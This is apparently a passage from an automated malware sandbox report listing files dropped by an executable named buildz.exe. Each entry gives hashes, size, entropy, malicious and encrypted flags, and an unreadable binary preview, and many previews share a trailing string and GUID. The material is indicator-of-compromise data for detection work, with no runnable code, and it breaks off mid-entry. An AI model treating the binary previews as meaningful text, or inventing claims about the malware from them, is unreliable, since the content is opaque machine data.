                        SSDEEP:1536:bMRYR+7xMH8qHpxzFX9xbEDPSHED+GziOQR+HA:6YkY8qJFFt0yKl5HA
                        MD5:EAD7401171B766DAA6B727E88151A3C1
                        SHA1:80569452C7184BC06BE938EEE75B971C6FA158F3
                        SHA-256:1EC225133BA8A79B7E102577A8653CFD15C3ACFE110D89D645310C17C436A823
                        SHA-512:9900CB857216F444C68501D9B8F86D0A0DCFB8133B5D04903E7D9EB1E9E43FF7FD6788A5A388F73E7D73BFAD51AD48D29061DE84DDD32AC2A39E0805783880C0
                        Malicious:true
                        Preview:A..r.D...'....'.@!..[.1...h}...#t.~..b.PQ.G........4Z...'|..9...Z...1...L..6......e!>.b.[6.....OJ.R.d.N.^I...aG.........H..>....h....e...["'r...Ec.gYwd..%9..>..C...Hf....Y..^..6Uf#.iCoG. ..s..Je.v.m......Tw.U..:D..]B..-...U....=YO.K.g%.j.x....(.....H<J.1.E...}....dv\.>+.....HA..nj.w...../x..^..[T%.W..|O711X.P.0.v...$....b.>......]s..;.......,c5.=...O.....|.E:.4..2 ..L~^.;...>.#.jO.......wv....H.....+...-....d.3.f.7..ly.i.......\...N!... (.B.\*..J.r..s}..2...p..q!........H...~..D..VA.w......N1m..f.......j...3h.5`....`!..~uE..<...LX.R.`^......}...l.Fn%......(..3t]0.5...a..D....\...z....Kb].[..K..u."..Q.if,.?..gM../.!...T......}...Sf..........~..M.....&..P-..3o..tY.UD..4.Y.... _..;..a....T..Z..<<;.."..t..%.TN.!..'...k[..GI/U..S.Ns'Uj.Y]..[......o^.8..)j6:.d...,..._..d.T1..G...;`.'...Wb$..E...&f....R...(5Q..:.<.Mc..I;J3.:."n...0.."..5..B.c...\.|9*ZV.cA.stBKf.p.N...-..v.....x..w.......H..h.f..c;......W.......U.FD\6..[P..".Q......7
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49486
                        Entropy (8bit):7.996443173510002
                        Encrypted:true
                        SSDEEP:768:x4qseLMJcdSdwo/qwfsto4FdAQaTlNpAhoV2p6ctqXTv+xkwweinHpQA:x0uSKVj+cuAhY66ctiTjjvQA
                        MD5:BF48E967805C6CE6E60C3A0E6A9E5031
                        SHA1:19C4C4D673848DBB8EE6F0B45EA7FE175FA4F8DF
                        SHA-256:929541FD692952DBEABD0EA8B491918170C2F5762501A457249635366E392D53
                        SHA-512:BC5EC71F6182B003912F5CF2811B32E3B3AB4A754B03C56851D2C4E404FF5B986A84C00E6F9473A9BF2C519FA1B938DF7FC079F289BE3E21530884B78B935413
                        Malicious:true
                        Preview:SQLit.R...n..D:......:..A....vC#.w....N.y.A....M.L.ibF..zt0.s..{..Ua..=.h.#!........%.7...W.j.s).:O....6%.@^w0Y.....t.....CL>1.....%Ir...\.t .y)....T......7...f.V.#.. .%..{...G...........oK.!...6..S..~G..W..x..C.r<.Y.C.'G...^r'q..B...H...U2}...?.<g.H...J.N....Oj ^=~.M.=.0?r.jj.. .?.......4.;!.5i....*.T..W.c.v......[.<.wd......A.N..8.....*.....f.ko.m...o.1..d..(..3...~.j.....W......t..R'.':FMr}N..@....{.C......dAr9...e..J&..~se..1.'..~....(.@.5.H.x5.....z....].|..4.....pvQJ........^@.....-.g..B..-.c.^.t..p....yf..m.....v.....s.o...[..k.:..\.v...:e.'...k...}..G9.S...U..[.y +..._......y.}.w..]h..\..........o%.*C...y.Oe,Hi...ta........9.#y..}....Y.x..#).Q..2.bWL..>q......9$..>.#.z..L....u..Ck..ZFW\L..76 ..w.a..U.)....-.V..Bw......p.A..wi...$.y..!c\~....E..o....!?...........(...#..?..O.~...X.Q[0.d.x\VX......zN.B..0.E..ac...c.........$.Yd...L......;S..7....6........87..g..;......._...0Z..W.T...2..[.......(.......by.....?]........~H#q.B
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):354
                        Entropy (8bit):7.283703856880574
                        Encrypted:false
                        SSDEEP:6:Qrn2lUDGqEnxq+oSS2k+Z6zjFwBhTcCxt6zUwqxWYhP3IMr8FGcii96Z:QLDGqE5TS2RZ6zZQzx0aWYFI26Gcii9a
                        MD5:EFAF2B1644ECBB0305D831484644C5C4
                        SHA1:A66E751C43075A92290456B8756285A010576EF3
                        SHA-256:78EE74ADF170B20B96F580F650AE1D877792214BB1E9C3A34AB917420AB35BEA
                        SHA-512:96E02384A2560580042346DF9ABA88B14CBE66574C0659643BC73BAC98368E9578DEDBE321BDDE582A5AC6EE1770F0549B96464D4C41858420A1D2288428AFBD
                        Malicious:false
                        Preview:1,"fuP.2....U..."`.|.....Z&*(...X..N.1.jU....T<a.................2..NI.. KL...M...Be.i.*.$.e..~....y.sM3.w...SK$.:....t?...u..A(o>,..y..wIp....27i...7...ug(I.g..AG9..__.j.zs..;..........<.......T...[0J.UF.#...`..qy...7>,...*..b.PYS.-.&+.}+.O!.&.h...6..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1554
                        Entropy (8bit):7.864799454666829
                        Encrypted:false
                        SSDEEP:24:4uIji4OCJt71MFixq4Q1g9OzBhxakZZYkb/0HlWcDHIysIsJv1CKcTc39JGbD:H2TOCU+uSMho8b/0AfF1Dc09JUD
                        MD5:DD580E3B745C10CA7A07C7797DB6A9E7
                        SHA1:A5ADBF0FB660CDFED6E0B8BA81103C2E7D0588BE
                        SHA-256:3ED93A01F78299B538FC176984A7ADFFDEBAFAA9E286689CAA0A7E4A0075C914
                        SHA-512:05DE0AB22510FB1275D8A83E4047F65EA9AF9FDFEF8B8A70C1D2043289D9143961C28E270C76F897FD3B1086DDC773D51E46DE4F58ABC4C7DB4AAF3641C61371
                        Malicious:false
                        Preview:1,"fujN9.r..G........7......a.8.....g.C....s;.B$..q..f..pxR;..L....R...z...f.X.....b.gB.I7h..S....>*N.5..3..W-..:......l...x..Y.h..A...+..AL*.As...c...e0../}.o....Q`..8...m...QN......\.S0..a......X..EFJ........r.#.M+.....m...`...t+..~........#......M.K..7..A..6..X.;..CL. 7.h.8..."..kx.v..u^x(xJm.O.. .h...@..d)b..M..P.9dg..g......m..*..Mvc.....FHx..wW.......(.."....Q.<.!....h.....F@Y.b.!..!..jH...M.o..K;..U&..R..'VH.......TE ..E...........~C#.tO|}...m...<n......L..R.K......p."...q-....\UJ...j$....:.......o.++y3N9...Ux.7(.v..7:....w..q0.4..7.k.B.C\B.].=..)1.....%.0...>.B.:...X.F..q.)...4.^.}.'..YR^`....u..0....t....'.......d8.*w.!Q}TG.M..~>..r..Iqz...ZJ,}.|..*GQXJD{m..o.9o..7...`.q.....3.j..*6.w..k:.O.b.|.f...9.nW....'.....P.g%v.+.`.]........'......=z....a.G.>.........P.r;cS:.L.f...~U..I..N.Q}...o.F.u.V.k.+.C;.N..<.jE..LjD....S...[(..U*].....UU..P.f1..}%(.F"N...<..@.E*^.?.....f..if..<.o(.f.CF.;...1..7M...&.D%X.=.Y63~.S>?.L....7.14.C..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):976
                        Entropy (8bit):7.799391554948212
                        Encrypted:false
                        SSDEEP:24:UTV4+ZFrPngMN/n+3YLFD7LdyGT3nWu7GbD:UugTdPF753T3nl7UD
                        MD5:C07D9227071BE7186A4266C67E1D1049
                        SHA1:115B1F7DE22EB730949A2849274F9467AF837067
                        SHA-256:8E880800AB1D2F3E1B8AB1C8E0650E15B8BE0800DC3DF3AF33F02712E76356F4
                        SHA-512:12ECF8F68CD44E4EECAD94BD5DE3AAD624C852624500A1D50DBEA666E2A9A152121BFEF74FE11678B6A94514367777C663A1A590DC29B425C87D41684F530AF3
                        Malicious:false
                        Preview:1,"fu.(`.l...}oFxqWK.._0.....7.d.....1...EE..oJ2GO,.>m...U...y!W;3....LAn.e..|:...(YF/...9..j<..8#....WN.5.!\...$kn.@./!K...../....c.I.r..v...B. ....<..H..(.._.........Z....Ccv.ed......mW7.)^a~.R.ab..<.........*.K....2.g..0.....N.Aen...9S.i..SE...4Q..|#.z.u..'.~TKQCZ..&|;1.U$...<.^..y.M..n;.]1wi.....M8.s.su.(1(..<.i.5...e.>..Z.k..r.oU..W..(....^1...M....s"&..',?<}[...]~.WLVTX.m-B.}..,[...Y[ .a.F.0'8..g............Y4.'..Q.p.Y.7..r...hm..\..NV...=v.@SP......>.7...;..,.....dB. ..j.k6....u.Kt..%..k.. ...l.&,.S.x\).^.S.F......v~Z.Kx.......ntKL.3.[......2.1.Gz..6.NR.f.e;..x.;..S. ..X.BZ}.r....}.}...3$........`u.8...Dx4.|.3.jX....y...>N@=..9...{..R..dz.j...v..... ...Uz`...F.B@.... 9.M.i.`....B...C.Mtp.1.....Hg..-M.%....8...<+R.k.X..<.'K..Y...... l...d..>,Y....[.7NH.P..i.|.^>...}.pe&D.......Wx...O..=..u.J....hF..M...C&[l..+.kz..n{.)._%rJ...H.1..O...G&...Mp.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):976
                        Entropy (8bit):7.795595834591662
                        Encrypted:false
                        SSDEEP:24:CW2acwjM7WbYLaT3f/icJ4D2vcrqyc2nPQ2v7kBxtPHGbD:k1wUHLkXicJgqy7PbzOxtPHUD
                        MD5:A7A18B646CE52ED67BA3368A043FC39C
                        SHA1:3CF816C21869065C6B4D9F1F9585D4129D3154EE
                        SHA-256:7667E5A040A4375C797E531DB2EE0CBA29021C0D3C58FFFAE0914A9C8FC8CECB
                        SHA-512:561751790FA15D5CB3423B6D5D8531640134720B2F9B393D987B172AD468ABAA5CBBAB29B87B45699B577E75F3862BD94E685D166E7C4F66481241ADC5DA9944
                        Malicious:false
                        Preview:1,"fu...eIB........F...d.A...Y.?.............1tgM.(.#...B3..j.l^;.......s%.....&{J..x.K2....L=.[...3.nS_..r.c..h.88ZbBeT6.A./..Be..!.}k?{.d....o<S.a.'.|.L.a..dL.@B.(.\.u.j.w.i4..'.2........_....j.........l77+F.\b.!.V.........&.....|.d...5N.\..o...]3>.tdZ..\q.\.wr1.Xt.6.a.o.............u..C.K.|s..#].%...z.^.N....`./GrL......Z..9.ub.Vb.K.(.3Qs.c]]S.m.:|..J-...\c..r....I.c.:...|P6e........eVs..nw...R..Q.S...........,.H.7..0.^O.=`0\....3P.YU.....^..R..bd..[j.X..R..H+...k......n{..R.P<..|.....=h.{.c.L..&hcJ.NuOj[*.F.^...........!cx..<9...}.2...)....B.Z5.X.._.1....B....r3.Z......y....v..q.W.x...v....}ps..1.... /.Lz6..M.[...z]nH$...l.-{IR......S..T..k...nS..2.8.uj...m.....y".;..W_.h......y7.|.f.u...."..._....[....v...*On......t..\.Q)Mv.+.Q..B(u..jn..2.u..Y[T..>.w.d...Kf.\.....%W;../+....&)T........y.W.F!...pu...-.o.Sc%..#..D......../....."...;...f..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):400
                        Entropy (8bit):7.311377402760762
                        Encrypted:false
                        SSDEEP:12:PaldvHJqAaigQP4rPKDrnaN9r/26Gcii9a:Ps1gQP4mraLrHGbD
                        MD5:08ED01EF243812C2C4AEB5F34FE4AE87
                        SHA1:E5D09BDFA7C8139F02C3DB1C3819D334F435E33B
                        SHA-256:AB135D630BC766E3F2947F451BC5AA12CDC9BBE9B55353DFF203A3B16A622DE8
                        SHA-512:76D8D45604A800371DE4A2502BC4D57EF1A9CE82E524B10E50B61E49DB8A4216BAD1B577CF4C36C2B005AFF735679856042A024A8CEF8D3BCA975974B7EEA256
                        Malicious:false
                        Preview:1.8BF....;....'.u..4.2..Xdv+&.wW..KIIj9...cG..lz...T.X...4.l......,......X.T.i..l..Iz..>...OGZ=.!.9..j..i2bE......].]....d...wv:.V.L-..O{.oI..0rP..>..Bf.Ib*0.D..Hl~f...i..4.. H..ef 4Bm.P a..P.~.WH#.A.....Ts....-q........|nA.e....O...z,{2..:m/..[..]^..F.?.j...5..".pFe...9.$...2...X%...k ..+eoOc..P)...>EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):468
                        Entropy (8bit):7.45567241962504
                        Encrypted:false
                        SSDEEP:12:cGC3ly/d42Fmnlk1t52BOeptsLMH7lPfeKsbyh426Gcii9a:cB3yzwc52BZ/s8qehqGbD
                        MD5:7E73774311E89DF8C137BF1AE4A17C3F
                        SHA1:75ECA62F828EB717126FFA5118652DD5F0160545
                        SHA-256:94620E91793A4114DA6E5CFD09FA3EE477B62226B962DD5DED50AAB3B41344EF
                        SHA-512:6CC5255A55B0372976FBB28E7856E4697456682CB76AD8A59B92BC297D84CE582292357FDB5C6BD10488AA4995D9FDC36733489E40445EE6031A7822168EC63F
                        Malicious:false
                        Preview:{.. ?...>......$.....N0..h..3a.?.$C.t. ..a..*.T.t.._...L......}.]...j.&r.......J.\.^&l.L...1zA..>Z.L";4...}..8B.Ha..o.*..5w.."...."h.Yyw/..CBo...=..o..T+......T../e..z\..%..q.8.....El...........?..._../.).5...7.$"....E....fo_...).xR:....,/V..!W...%.......-...L.j<K..W)U.(........l..0.y.v...h...UP..le.N)..3U....m?T..C.W.js..>$.;.T...[..W..w....*.T.7.:....V.`....x...m|..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3498
                        Entropy (8bit):7.938467932841874
                        Encrypted:false
                        SSDEEP:48:TvegAJxcA6TRqQhtmNBAuUmNFPfJuZAqfkU0pHqY3jNWZ/0PtVAS38KrMFPePnUD:LetcjRaN1FPBuZAnUQjs0PLAm8KqPWA
                        MD5:83D03D182AB68E6E2963696BE6526AE2
                        SHA1:48E3238B018C8EBC7778C6DF77090803A5279F82
                        SHA-256:2C67567B77D10DEE6ED75109163BD75A23AAB270650F30FBB3CD20688E367933
                        SHA-512:EC14215D9830DC66D486910D3B6B698EE1BA7BE029CF0F502E8C640FC08105C8739ABFC541598888195C406E1CA1AEA486A639920E1CEBA062B59ED319CC1563
                        Malicious:false
                        Preview:{.. 1F...b...9Z.......7.T5....@.Tk..*z.....(.{.....BP0.....XI1A.R..z..."|._.kQ..f..jZ....u.._...t.$.lm,.r.a...&1.....XS...&/.wYHH...N...>x....GAYy.;......$0.x1.Fw...ly..........[..{5.L@..f[i...;.FM......r>{...MF.%..>..by..f.-..a.^XI..A.C....jy1.D.s....#yi..v.-...W\.S...0..e.Y..R...N.y..e7L~...Y.=...KT....)L.l4.N..>.........;9.....?./r..I..&=...k8....c......B..j..Ye..*'!j1ds.G.0)...n.~.va.Y1...g.d\......e.....d.~;#.......-z.<...T#4...'L..+...3...t2)[6k..^..ff......r.nn.......5......x..f.e.F7.....iE..2..V;..uN.k..|...........{.L,x..D.....IU....:.M..p.....q-j....n.J.F..Q.$K...._...$...4..i5....co..nS...6.z^.".....3 ZQ.3~..J..Y[Zw..h$M...s!.$g6S..O.5.0...S..o....zX.-.U\C].-9..x....M..-...^0/aQI...vk..U].PZxrQ@_x..I.C...Z}(..2d(....e.c.T..{.P...}+.kC.........Ze..o.J...o.|.Cui..hK.9.W...,r,.d..T}."..-+.?"r..=i.=..m..7...$.PU..(.Q...w.......Nz.s..0..&..9.s.z.......r....Y.{.f.....P....L.".#.-s.\.`...8..L....k....8z.|.".TJ....e..........?-...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):218058
                        Entropy (8bit):7.079930776461911
                        Encrypted:false
                        SSDEEP:3072:GPo9Dl8968bmQhAX2fAjPwKejQ8S5/7PkXhxHor9LRbDm+nlBITAhsWlRxOmFG1D:Go9RwmQGPILI/aE7HjuGRxOmFG1Ir+
                        MD5:6FD5D5271476C9980E785C7757D402FA
                        SHA1:560712032A08D3636C43C9CD2237820589312BC1
                        SHA-256:5F3DC843B9E2E3E67E8D488A857B71A642D90CF4015B30187273CC55C4EAD93B
                        SHA-512:2F1F2657C951A3737AEE66CD19DEAC6DD997433C866BA67838202BB9898E50678B8F058FB7EF522E7E0763700BB01183FA968BF49A3BD95E594BD03B6205ED7D
                        Malicious:false
                        Preview:{. F..Hy.:m.PkZ.....=..&..@..`.2...Wh0...b6......Q....5..Y...6..p....|O....M.....A.5C.d..[....L...R$.sA9./.......6..\P2B.@.-R.....2..G.....U..7...u....;^...u.4x.Rq.i..z.GIo<xtd....z..>..P;~.v.G...H..x............M...=2;/........>8.*8....3,.,...0:..Caw.K....c.Lv.".*>.K{...p.j..<.G.f>...]!...)X.M..68c..r..h...vn..4.....A<......-28....p..2-l=-W.[..0...=.r....s..o..A&..*...dX......|..I....||....G@...........:.Q.[.>=$...q.0}.r.7JSH.I-....$s.....#...TTQp9.}..1.....%.?CLh6..8.C....]..k.9*.1.e..m5S8[..5.....^..J.c_.f.n5g..Q...)..<...KW....A.....;....T(E.'....N... V.....fR^.....L...rQ..v..$:H.r..'Yp("..R6}g....S...V...?.B.f3.u.<..p....|.R....o..&..F...0..........q...Y.?...i.d^.D...Z3..@......@..s[*.!O..3W...b(F'..>.........D.?i..E.....u.CHD2*:VJ.k..&h",UhK.../....&.r.V|.*.......@ldMb..!..5....v.)N.._G.3.........s.8.."...g.\u..k....}.....A.........U..;`5.>...ZY.........N/...].t.AI.:...w..n["...R.b.....>K. @...4Db.@x..3.R.Y...b>..@...!....Bd. D. 6
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4729
                        Entropy (8bit):7.963221251490738
                        Encrypted:false
                        SSDEEP:96:Gn/fvmVb393tN0llXrD5sWHEYtayfWM23Nlu2B+YruL/HLMiK7qevA:Gn3vAt9illXiy7tbK3D+YrGvLMdvA
                        MD5:BB385BFCF6E1EC8E287489DCAA0CF8C0
                        SHA1:39C54BDC7567077A01997C562A892290A053B643
                        SHA-256:4A44FAAEA18D9688F4A4565814AA7D8B4DAE25861ABCD7FAF8B70205A51A42C3
                        SHA-512:71DE489C92E546F992D4145012CA70DD3F48F761A5644E0073F38EA02E1B551F6BE991D8EFB9F25A5BF0C0E66D071BDBDD96AD7E297769C096083745B188B74B
                        Malicious:false
                        Preview:{.."g...AK....<.w;...vxo......m.z .f...m.j.-.....K_.l."K..W9....F...!. .i.s......#..........)..q}.)..Xj.>?.@7.....|...2..>~...i.......X..!7.!....*.....5I.p........z..0.M.U....5...z....... -..F.c=..`........s.@.'e.qzT.=....3...'...62.&L{)..]_.....L...mI{ZW.3..F..)$..h\F...(...At......;..&..O.@.x....1g1...S....)....P...e..k.e.*.../.I.t...O.uA..@x@...S}er...E;{0......Fc.G.U........\.M...<K}....q....Oo.._.:W...)...........&..:..j.....`*...$($(K.u].(<..U.....z..S.6..:Y....h.....S...|...*.Yo.2.2..(.ayX/..Oq......c....CYW.I.G......L.Vc{........S.m..>..1o.Z._...|o....V...@c'.4M..&.v.{P=o^!D..\..f...L...b.EN...6.k..x...n...._5.]9(.......U.....:L.M....%...9.\\.2:.rFTRj.].....:#..s@.4..7..r-....Ph..|..JXH.0...J.pEUF...q..q.z..y.M.!.md......)E.{.....UMk.....t. <.pM.r...5%1.+..5op.h...H..?...~.m......gZ...u.E...a....i.v...-.M._.$~...J3.k..I..U.....~.J./.i$.r.......R..(..s..t1.4....1.P....6./.F.K.`.......~X....}.Y.......J...LWX].....|....:....iw.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):400
                        Entropy (8bit):7.347585277361698
                        Encrypted:false
                        SSDEEP:12:kfzD5GfWEo5sL/YEXIXKfuxsXNcMn26Gcii9a:kbDl5SwEWMdXGbD
                        MD5:1887F39C8E345C863019794D5F1035C5
                        SHA1:5ADD99C30BECBCEF4EA3913AED03B66651E15106
                        SHA-256:30823D885713F465D7B4D59E9FDF3D668ECC5046499A2BE2393E1BF2F219D8E6
                        SHA-512:F633E2826EFE22030474B856433EB6D3B59FD50C8E73BBD87633F40C2F69B3CA791CCE21AE8E29CCD792AA787CA839A71EF22B965D674E8376DB7AE5F3F1C589
                        Malicious:false
                        Preview:1.1EDV44UuN..3.W..:..8....k.`.p,..%.\Q..(.v*@..aE..H.5..i!.O..#.O*.....B._..2..A...PsH..`...==.G..b..:{;=.*..Z..K<..:.H7.....sU...%..:.!../.&.."..0j.:.]:..<7B..hbv.8_...|l..=....f....f....g1-.}.W.t......1Y.b.....J..."t...z.O....Cf.....l3..ak.....V.F....8.X.hwr....DAz........~...5.....e....w.m...."..YKEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):452
                        Entropy (8bit):7.409699200801094
                        Encrypted:false
                        SSDEEP:12:ME44M081U6pAHUE5jiaCSrhe+9ruL3U/26Gcii9a:Mz4M081AUENT96GGbD
                        MD5:26C0F11E2F8EF8B7A78E293932E2E749
                        SHA1:A995656527648B0A638E13FBF1F6073564995393
                        SHA-256:0D554793825307DD5D006F88E8ADAC75441F9AC920EAE0ED92DCB4BBEB92A49D
                        SHA-512:FEF60BE2380EFC772FADCCAE8F5BDF307F762692695DE42FD772295411F7D6E988234FA75C1B1D48D7BBA45BFB0AE42A876D979B194A66CE8AF23737A0618034
                        Malicious:false
                        Preview:.{..nuN...p.n.. .....'..7.U.P...gz,x.!.....I...R....:.BH!as.7....U...k.e..;.......J;.Rt=.G.kp.Jz...L.t.ij....$5..|.....%{T*.Rz0^...$../.:..I ....[.t7......A..wQ...!.e...}.z.`..........Vk...PJ.-..l.e...BE.....Y..m....{X...[?~.y....}]......5.........-v...WX....aM...t.x..;.{..z..8....m)W5.=........s..o....g=#.I...x6.[..x.$..).kB.x....f./).f..ez..y.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):534
                        Entropy (8bit):7.549474545557745
                        Encrypted:false
                        SSDEEP:12:5iXDn7p8TkJUliNwpEDiW+37m8GNxaUWhaaX26Gcii9a:5MuiNJ+j7/GNx6hPGbD
                        MD5:D7E4E21F737BC05666EDB080D3CE07F5
                        SHA1:03B58CD94E9F308DE1BB853A84346EA3A2C2A9C8
                        SHA-256:EA3F3BD78FDA98DFD57E3BAF5DA73B73207AD259CC90C99EAF7093066F00ACE6
                        SHA-512:A889A317103FE8FAAD84B5B951374E07F6A990FD99E070F182E9123F47598182032FA06374EF18D9D8017B0A164DEE8F0EF3A17D4AC70ACA01C649E26A0226D7
                        Malicious:false
                        Preview:{. "P..gV.>:.@EWS..i...2..[[(..t=....ia...0.b...i.X.\.g....l....Rcn.$...Z\....t+-.....}..|m.....o.a.-|L.% .?7..*H.V.Ro....F.H9..e..$.M.A...A........."-......x. T."..oh........J.....W.\].$....&Q.m6IQ.1q...M.6.:g...W^S;.41.}3..........9r...c.V.......5.d...k......N.f.....%#.....Y;P....->.Zr?;..Z.M..A@...*2...A+=s....RC....'......?F.9.%D..85.Z@m.c.<&PZc..........mF...v.d.....IK.hp.&TJ.J.?..Q+.....W...u,.:...;t..ym..'C.<.;F....=...r..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):520142
                        Entropy (8bit):6.027534009681783
                        Encrypted:false
                        SSDEEP:3072:NMJhHGgwMKXcUQCol1pbZT8dmJRS9CmdVVj9qJ2pFW8KQWNE8k/FFgPG+zvHA:NShHGgwMooFYR9CgVd9JpFIQXFSPG8g
                        MD5:B5CBA654F61900D72B42C525339A013F
                        SHA1:4859437FF9C6B12DC3A261FE2EF4CD2F931AB799
                        SHA-256:350AEA1013C6DC3DF881430D924C5ED35AED96F617D3233EF2128ED04C96A92B
                        SHA-512:BD7C5611F30ACB37B1427D4090C77152AB79332C0866710A6AD1465BEB8A9E17A0D7CD6DEFB2FC79FC5C98CF81B1A9F6421693F8FD595164C77F18D7AE736012
                        Malicious:false
                        Preview:{. "...4. ..b..@...>..@.b\&...h...=.....+..b......j.....)...o.h`gQ.T.hE.Ca.......\........,.-........`.^H.p..J..Yh..N7...Y.J...K...O.=.........6..d!.d........lK...8.........[(. .]g...68....$gn.....6.`..l.BV.L.]....H ={..R&..L...k......?f......B..!.!.7..*F...]7...G+..6oy.{42|f....I......I1T...`.X.K.k.....k.P\.G....mU.F.s..X..`..Y..u.;j..7v.k.D..v]C.j..z%...?.@.p8mH...........>.....l..s.D.........S...i..} ..4k.3b......y.c.(.*Oq.J..........6..I....~=To....`.'..D....@8HA..T;.2.?w..N?....<.=..U.2.......S......ln.W...S9.......p.$&_......:....b.[.,#..R,|....)..U34.&.'=./..z2n,...P..N8=s").p.5.).f...........HR.(7..`KR.I.[.XRMB.T..t.}3...?......)......8..|@2..H....x.84ZLL.gY....b..a..M.......B.....!N.h*..xxC...V...-.>.X.~(..t..;:..qUko>.l......@l...:T..i...~... ...$.i...Y..\.....bw.~...cNj{:.6..".+..p5.......A.....C.......M._.J.m_......T...$M....*.....~...d+.... .*0..n.j.q.vi.o.Oa.....a..'.By.^..+..8^...v7.....q.)... .G)._}u&.[.+.....>].")j..qX.]
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4194638
                        Entropy (8bit):0.5184856873195793
                        Encrypted:false
                        SSDEEP:3072:u227z1T0VD5q0MxOeACQ9z0dhrWqmn+LLYcLi97RrVNwaP5A:Z2lw56xOeAC2Mhr6ko7RrVNS
                        MD5:771F4E568C11D616B5B5077971219602
                        SHA1:1233F54713ABC45A53812C3090C19EF1442D4DB8
                        SHA-256:3146988ED79CBE246A30FB5458F46B80369443E2F86DC3CB6112B1CAAB25D086
                        SHA-512:D88B6F06A0B7F9C2FBB95E86506E0B1C094642F6E35A1DCF4A9ABB1DDFAAC03833A76D2888AEFDD0A1B0F5724819BD145D4A3FD6A73B73A9A6D23B323706A3D3
                        Malicious:false
                        Preview:.....V.M47^UC.s.o... ..?L..?........\....!+....(.......Xm.5....$..0. ,..B;y..{.]fG....0.......8v..*oE<`.S]i.X...]......!..[..H..Hl......4..\.@ENSw.rXU.....v^.i.X.........pwR..;.N..1t..6.......*...>q.2Q.....m'.L......Ca/8Rc{N.9...".i.z}......s.>}....B..y.z...U......k.0...n.&;.....fK.Z.c..L.=.j.W4...B ,..CM.N.RY..>o..'..*u..P@..H.Q..L....5.V..?.....(...9.[.6.Bk.W.).&l8."\.F..Iq.b.H.......1z.'.4.Y....T.;c1...pQ.$...I....7k..\j....M.....1......6;....$k[j..H......Z@~....hM..nt.(.....0.....B*...&..B.H>[.2....N.Z...]....w..)e... ....KB.R_B.pr..@.../."jm.....E...xW...x,+.oWb.G.3.qFq.....4.d".....*...`..$.W.z.`o.-8.....>.a.]tpJPo....#"...!w....Z0.At.0..A.i.|.".......(...G..~.YN=F.N.r.y..\.4 ....h#...a...Q.p...=...P.Ae......e.8}.8b.R@.:.o@......D..-.F..zw2..S..w...-..Es.ct.Qw9.JM ....Z.H~.<..=..G.Gm.....J.E. ...<,.h.@X@..Y.1.yo.B..KFhU...ak'|......Z....pUX(..Q....Y.[....H...q..............W.J.0......-.}...\............|.e.W..7.8.TD.L.HB..'M)..)..^....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):400
                        Entropy (8bit):7.3229344829879475
                        Encrypted:false
                        SSDEEP:6:SWfW/GyrWawmFVmjhNbmtdwbnwwT6IDPKypnuMahRm9blVTsCamV2lSiXMr8FGcq:U/GTmFsho1i66Plra3QVp2l126Gcii9a
                        MD5:660898C24F2DFEA1DF22DA27024A182A
                        SHA1:4FE341282F4A7736CC09FCA1FFA2FAE7C861A5DC
                        SHA-256:1CBE7C17ED83775EFBD470C5B65957B11BD4565740B27BEE5782CE17E7BBAF6F
                        SHA-512:83D7C97BCFE9B2B9F3FB719E52DCF205F8EE613D791EC096B6D97313B03892C4ADCD302E3F0372D9E0FA3F85A7DD2F81BCACBF77CCD4E31B6FE71C71988A224F
                        Malicious:false
                        Preview:1.44Cd.n.&+b.....R.*R..d@.'\F..:.$.....A.q.w..1rp.b.:3du..c.5....GW.+w...H..3.M..et.f"..;.............2.d.H.0Tr....:j.%...9.......'V5$JOa-/.M......|.6).#.`X.+..Mz..f.r'..#..v..W+8..|R.V.1l...!...A'....$.+..r..f..8...Z.7n..'......eu:"q._.....Z...kF.0.^..[F0...t.s;.o.*.......b.n..y.Y@p........).&<...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):447
                        Entropy (8bit):7.323497109022179
                        Encrypted:false
